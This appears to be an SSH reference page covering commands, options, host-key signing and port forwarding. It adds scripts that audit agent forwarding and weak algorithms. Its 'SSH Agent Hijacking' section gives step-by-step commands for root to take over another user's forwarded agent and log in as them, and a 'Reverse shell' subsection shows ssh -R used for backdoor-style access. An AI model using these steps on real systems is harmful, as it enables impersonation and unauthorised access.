ssh
Table of contents
- Commands
- SSH Options
- Unresponsive Session
- Run command in background via ssh and no open ssh session
- SSH pubkey signing
- Portforwarding
- SSH Agent Hijacking
- Find out which IPs are used in an IP range (e.g. VLAN) for undocumented VIPs
- Query OpenSSH server
Commands
Command | Description |
---|---|
ssh-add -l | lists all keys loaded in the agent |
ssh-keygen -f ~/.ssh/known_hosts -R [IP] | removes the known_hosts entry for the IP |
ssh-keygen -l -f [sshpubkey] | validates the public ssh key and prints its fingerprint |
ssh-keygen -l -E [checksumtype] -f [sshpubkey] | calculates the fingerprint for the checksum type (e.g. sha512 or md5) |
ssh-keygen -y -f [sshprivatkeyfile] | outputs the public key matching the private key from the file |
ssh -Q [query_option] [destination] | will query information from the OpenSSH server |
ssh [targetuser]@[targethost] -J [jumpuser]@[jumphost] | ssh first connects to the jumphost, creates a port forward (22) and then connects over the forwarded port to the destination server |
SSH Options
Option | Description | Sample |
---|---|---|
UserKnownHostsFile | Defines the path of the known_hosts file | -o "UserKnownHostsFile /dev/null" |
StrictHostKeyChecking | Enables/Disables strict hostkey checking | -o "StrictHostKeyChecking no" |
ConnectTimeout | time in seconds until it gives up connecting | -o ConnectTimeout 1 |
ConnectionAttempts | number of attempts when trying to connect | -o ConnectionAttempts 1 |
Unresponsive Session
Sometimes you stay connected to a server while you do something else or walk away. When you return to the terminal where you ran the ssh command, the session may be stuck and no longer respond. Of course you could just close the terminal and forget about it, but what if you have done other things in that terminal and want to keep working in it?
Well, there is an easy way to do so: press the following keys one after the other, and it will kill the session and return you to the old shell session of your terminal.
Enter
~ (tilde)
. (dot)
After doing so you will see something like this:
myremoteuser@remotehost1:~$
myremoteuser@remotehost1:~$ Connection to remotehost1 closed
mylocaluser@localhost:~$
The return code will be 255 for this action.
Run command in background via ssh and no open ssh session
Via tmux
Make sure that remain-on-exit is not set in the tmux config. It would keep the tmux session open until the user manually terminates it.
$ ssh mydestinationhost "tmux new-session -d -s myfancytmuxepidamicname \"sleep 10\""
Via screen
Make sure that zombie cr is not set in the screen config. It would keep the screen session open until the user manually terminates it.
$ ssh mydestinationhost screen -d -m "sleep 10"
SSH pubkey signing
Generate a CA for signing pubkeys. It will ask you for a password, please use a good one ;)
$ ssh-keygen -f <caname>_ca
Now you will find two files in the directory: <caname>_ca and <caname>_ca.pub. To sign the pubkeys from the other hosts, you should have them available locally.
$ ssh-keygen -s <caname>_ca -I <key_identifier> -h -n <host_name> host_pub_key_file
Optionally, you can add an expiry with -V.
Sample:
$ sudo ssh-keygen -s /home/suchademon/VersionControl/ssh-sign/we-are-the-sons-of-sparda_ca -I host_sparda -h -n sparda /etc/ssh/ssh_host_ed25519_key.pub
[sudo] password for suchademon:
Enter passphrase:
Signed host key /etc/ssh/ssh_host_ed25519_key-cert.pub: id "host_sparda" serial 0 for sparda valid forever
Deploy the new signed pub key to the host and restart the ssh daemon.
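The signing steps above end to end, as an added example that is not part of the original page: it creates a throwaway CA and host key in a temporary directory, signs the host key with an expiry via -V, and checks that the certificate's Signing CA fingerprint matches the CA. The host name sparda.example.org, the function names and the empty passphrases are assumptions for the demo only; HostCertificate and @cert-authority are the sshd_config and known_hosts entries that put a host certificate to use.

```shell
# Added example: sign a host key with a CA, then verify which CA signed it.
# Works in a scratch directory; /etc/ssh and ~/.ssh are not touched.

# make_signed_host_key <dir> <ca_name> <host_name>
make_signed_host_key() {
    local dir="$1" ca="$2" host="$3"
    # Empty passphrases (-N "") only because this CA is a throwaway demo CA.
    ssh-keygen -q -t ed25519 -N "" -C "${ca} CA" -f "${dir}/${ca}_ca" || return 1
    ssh-keygen -q -t ed25519 -N "" -C "${host}" -f "${dir}/host_key" || return 1
    # -h host certificate, -n principal (host name), -V expiry in 52 weeks
    ssh-keygen -q -s "${dir}/${ca}_ca" -I "host_${host}" -h -n "${host}" \
        -V +52w "${dir}/host_key.pub"
}

# cert_signed_by <ca_pub> <cert>: succeeds only if the certificate's
# "Signing CA" fingerprint equals the fingerprint of the CA public key.
cert_signed_by() {
    local ca_fp cert_fp
    ca_fp=$(ssh-keygen -l -f "$1" | awk '{print $2}')
    cert_fp=$(ssh-keygen -L -f "$2" | awk '/Signing CA:/ {print $4}')
    [ -n "$ca_fp" ] && [ "$ca_fp" = "$cert_fp" ]
}

# deployment_lines <ca_pub> <host_pattern>: entries that put the cert to use.
deployment_lines() {
    echo "# server, sshd_config (then restart sshd):"
    echo "HostCertificate /etc/ssh/ssh_host_ed25519_key-cert.pub"
    echo "# client, known_hosts:"
    echo "@cert-authority $2 $(cut -d' ' -f1,2 "$1")"
}

demo() {
    local tmp
    tmp=$(mktemp -d) || return 1
    make_signed_host_key "$tmp" demo sparda.example.org || return 1
    ssh-keygen -L -f "$tmp/host_key-cert.pub" | grep -E 'Type:|Key ID:|Valid:'
    cert_signed_by "$tmp/demo_ca.pub" "$tmp/host_key-cert.pub" && echo "CA matches"
    deployment_lines "$tmp/demo_ca.pub" sparda.example.org
    rm -rf "$tmp"
}
if [ "${1:-}" = "demo" ]; then demo; fi
```

Run the script with the argument demo to see the certificate fields and the two deployment entries.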
Portforwarding
Forward multiple ports from the source host to the destination in one ssh connection
$ ssh -R <SRCPORT>:<DESTIP>:<DESTPORT> -R <SRCPORT>:<DESTIP>:<DESTPORT>... -l root <SSHDESTINATION>
Sample:
$ ssh -R 9999:10.0.7.4:9999 -R 8081:192.168.0.2:8081 -R 8140:192.168.0.2:8140 -R 389:10.0.9.5:389 -l root <SSHDESTINATION>
$ ssh -R 27:192.168.0.1:22 -l root 192.168.1.2
Reverse shell
Such a port forward can also be used to establish a reverse shell connection like so:
$ ssh -R <RemotePort>:127.0.0.1:<YourLocalSshServerPort> <Remotehost/RemoteIP>
On local host (portforward (2002 to 22) from remote host to local host):
$ ssh -R 2002:127.0.0.1:22 192.168.1.2
On remote host (accessing the forwarded port):
$ ssh 127.0.0.1 -p 2002
SSH Agent Hijacking
First check whether an additional user is logged in and note the user name
$ w
14:08:38 up 29 days, 4:19, 2 users, load average: 4.03, 1.60, 1.23
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
SOMEONEELSE pts/1 10.10.10.100 14:00 7.00s 0.03s 0.03s -bash
ISTME pts/2 10.10.10.101 14:08 0.00s 0.04s 0.00s w
Become root
$ su -
Get process of the ssh session
$ pstree -p SOMEONEELSE
sshd(110863)───bash(110864)
The shortest way is to check the tmp dir and search for agent.
$ find /tmp/ -name "agent.110863" | grep ssh
/tmp/ssh-TE6SgmexKR/agent.110863
Now you can just easily check the ssh agent
$ SSH_AUTH_SOCK=/tmp/ssh-TE6SgmexKR/agent.110863 ssh-add -l
256 ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab SOMEONEELSE@SOMETHING (ED25519)
16384 ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab .ssh/id_rsa (RSA)
So you know that there are keys loaded and can use them ;)
$ SSH_AUTH_SOCK=/tmp/ssh-TE6SgmexKR/agent.110863 ssh SOMEONEELSE@HOST2
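The steps above work because root on the remote host can reach every forwarded agent socket there, so the exposure starts with agent forwarding in the client config. As an added example (not from the original page), this reports the Host and Match blocks of an ssh client config that enable ForwardAgent; the function names and the sample config are constructed for illustration.

```shell
# Added example: report ssh client config blocks that enable agent forwarding.
# forwardagent_hosts [config_file]   (reads stdin when no file is given)
# Prints "<block>\t<value>" for every ForwardAgent setting other than "no".
forwardagent_hosts() {
    awk '
    {
        sub(/^[ \t]+/, ""); sub(/[ \t\r]+$/, "")      # trim whitespace
        if ($0 == "" || $0 ~ /^#/) next                 # blanks and comments
        # keyword and argument are separated by whitespace and/or one "="
        match($0, /^[^ \t=]+/)
        key = tolower(substr($0, 1, RLENGTH))
        val = substr($0, RLENGTH + 1)
        sub(/^[ \t]*=?[ \t]*/, "", val); gsub(/"/, "", val)
        if (key == "host")  { block = "Host " val;  next }
        if (key == "match") { block = "Match " val; next }
        # anything but "no" (yes, a socket path, $VAR) exposes an agent
        if (key == "forwardagent" && tolower(val) != "no")
            printf "%s\t%s\n", (block == "" ? "(global)" : block), val
    }' "$@"
}

# Constructed sample config, not taken from a real system.
sample_config() {
cat <<'EOF'
# constructed sample
Host bastion
    HostName bastion.example.org
    ForwardAgent yes

Host build-*
    forwardagent=no

Host *
    ForwardAgent = Yes
EOF
}

sample_config | forwardagent_hosts
```

Against a real client config, call forwardagent_hosts ~/.ssh/config; a host that is only used as a hop can be reached with -J from the command table instead of forwarding the agent to it.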
Find out which IPs are used in an IP range (e.g. VLAN) for undocumented VIPs
a="10.70.44."; for i in {150..152}; do echo "${a}${i}: $(ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=1 -o ConnectionAttempts=1 -q ${a}${i} hostname 2>/dev/null)"; done
Query OpenSSH server
You can fetch information such as ciphers, MACs and so on from a running OpenSSH service by using ssh -Q.
This will return the list of results.
For example, querying the security configuration from a server:
$ for f in cipher mac kex key ; do echo "$f:" ; ssh -Q $f 10.42.42.1 ; echo ; echo ; echo ; done
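ssh -Q prints the algorithms supported by the local ssh client binary; what a server actually offers is visible in the "peer server KEXINIT proposal" lines of ssh -vv. As an added example (not from the original page), this extracts that proposal and flags entries from a deny list; the deny list, the function names and the sample debug output are constructed for illustration.

```shell
# Added example: list what a server offers and flag weak algorithms.
# Live use:  ssh -vv -o BatchMode=yes <host> true 2>&1 | weak_offer

# server_offer: reads ssh -vv output on stdin and prints
# "<category>\t<algorithm>" for the server side of the proposal only.
server_offer() {
    awk '
    /peer server KEXINIT proposal/ { in_peer = 1; next }
    in_peer && /first_kex_follows/ { in_peer = 0 }
    in_peer && /^debug2: (KEX algorithms|host key algorithms|ciphers stoc|MACs stoc): / {
        sub(/^debug2: /, "")
        cat = $0; sub(/: .*/, "", cat)
        list = $0; sub(/^[^:]*: */, "", list); sub(/[ \r]+$/, "", list)
        n = split(list, a, ",")
        for (i = 1; i <= n; i++) printf "%s\t%s\n", cat, a[i]
    }'
}

# weak_offer: keeps only offers that match an example deny list.
weak_offer() {
    server_offer | awk -F'\t' \
        '$2 ~ /^(diffie-hellman-group1-sha1|ssh-dss|arcfour.*|hmac-md5.*|.*-cbc)$/'
}

# Constructed ssh -vv excerpt; the client proposal must be ignored.
sample_debug() {
cat <<'EOF'
debug2: local client KEXINIT proposal
debug2: KEX algorithms: curve25519-sha256,diffie-hellman-group1-sha1
debug2: ciphers stoc: aes256-ctr
debug2: first_kex_follows 0
debug2: peer server KEXINIT proposal
debug2: KEX algorithms: curve25519-sha256,diffie-hellman-group1-sha1
debug2: host key algorithms: ssh-ed25519,ssh-dss
debug2: ciphers ctos: aes256-ctr,aes128-cbc
debug2: ciphers stoc: aes256-ctr,aes128-cbc
debug2: MACs ctos: hmac-sha2-256,hmac-md5
debug2: MACs stoc: hmac-sha2-256,hmac-md5
debug2: first_kex_follows 0
debug1: kex: algorithm: curve25519-sha256
EOF
}

sample_debug | weak_offer
```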